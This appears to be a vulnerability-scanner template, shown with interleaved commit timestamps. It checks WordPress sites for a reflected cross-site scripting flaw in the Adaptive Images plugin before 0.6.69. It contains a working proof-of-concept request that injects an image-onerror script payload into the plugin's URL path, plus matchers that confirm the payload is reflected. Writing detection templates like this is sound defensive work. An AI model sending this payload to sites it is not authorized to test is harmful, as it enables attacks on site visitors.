2022-02-27 15:50:50 +00:00
id : wp-adaptive-xss
info :
name : Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author : dhiyaneshDK
severity : medium
description : The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
reference : https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
2022-02-27 16:06:08 +00:00
tags : wordpress,xss,wp-plugin
2022-02-27 15:50:50 +00:00
requests :
2022-02-27 16:06:08 +00:00
- raw :
- |
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
Host : {{Hostname}}
2022-02-27 15:50:50 +00:00
2022-02-27 16:06:08 +00:00
matchers-condition : and
matchers :
- type : word
words :
- '<img/src/onerror=alert("document.domain")>'
2022-02-27 15:50:50 +00:00
2022-02-27 16:06:08 +00:00
- type : word
part : header
words :
- 'text/html'
- type : status
status :
- 200
